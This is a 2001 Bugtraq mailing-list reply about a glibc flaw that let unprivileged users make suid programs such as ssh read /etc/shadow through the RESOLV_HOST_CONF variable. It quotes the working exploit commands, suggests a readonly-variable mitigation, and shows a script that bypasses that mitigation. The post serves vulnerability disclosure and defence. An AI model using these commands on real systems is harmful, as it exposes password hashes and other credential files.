Bugtraq mailing list archives
Re: Glibc Local Root Exploit
From: Digital Overdrive <digiover () dsinet org>
Date: Wed, 10 Jan 2001 23:43:31 +0100
Charles Stevenson wrote:
Hi all, This has been bouncing around on vuln-dev and the debian-devel lists. It effects glibc >= 2.1.9x and it would seem many if not all OSes using these versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and the actual fix was a missing comma in the list of secure env vars that were supposed to be cleared when a program starts up suid/sgid (including RESOLV_HOST_CONF)." The exploit varies from system to system but in our devel version of Yellow Dog Linux I was able to print the /etc/shadow file as a normal user in the following manner: export RESOLV_HOST_CONF=/etc/shadow ssh whatever.host.com
huge typo in my previous post... services has to be profiles ;-) ---- [Credits to ^herman^ in #hit2000 on ircnet] A temp. sollution is to place this in /etc/profiles: declare -r RESOLV_HOST_CONF jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow bash: RESOLV_HOST_CONF: readonly variable jan@flits102-93:~$ ---- But even here is a workaround for : Make a script (e.g. blaat) !#bin/sh export RESOLV_HOST_CONF=/etc/shadow ssh whatever.host.com ~$ sh --noprofile blaat [again credits to ^herman^] Regards, Jan (Digital Overdrive) -- .~. http://www.dsinet.org | http://www.dsinet.org/hackfaq /V\ digiover () dsinet org | digiover () cotse com /( )\ ^^-^^
Current thread:
- Re: Glibc Local Root Exploit, (continued)
- Re: Glibc Local Root Exploit Thomas T. Veldhouse (Jan 10)
- Re: Glibc Local Root Exploit Ben Collins (Jan 10)
- Re: Glibc Local Root Exploit Pedro Margate (Jan 10)
- Re: Glibc Local Root Exploit Gordon Messmer (Jan 10)
- Re: Glibc Local Root Exploit Philip Rowlands (Jan 10)
- Re: Glibc Local Root Exploit Ari Saastamoinen (Jan 10)
- Re: Glibc Local Root Exploit Matt Zimmerman (Jan 12)
- Re: Glibc Local Root Exploit Jerry Connolly (Jan 10)
- Veritas BackupExec (remote DoS) oh3mqu+bugtraq (Jan 15)
- Re: Glibc Local Root Exploit Joe (Jan 10)
- Re: Glibc Local Root Exploit Digital Overdrive (Jan 10)
- Re: Glibc Local Root Exploit Digital Overdrive (Jan 10)
- Re: Glibc Local Root Exploit Brian (Jan 10)
- Re: Glibc Local Root Exploit Ben Greenbaum (Jan 10)
- Re: Glibc Local Root Exploit Simon Cozens (Jan 12)
- Re: Glibc Local Root Exploit Matt Zimmerman (Jan 12)
- Re: Glibc Local Root Exploit Charles Stevenson (Jan 10)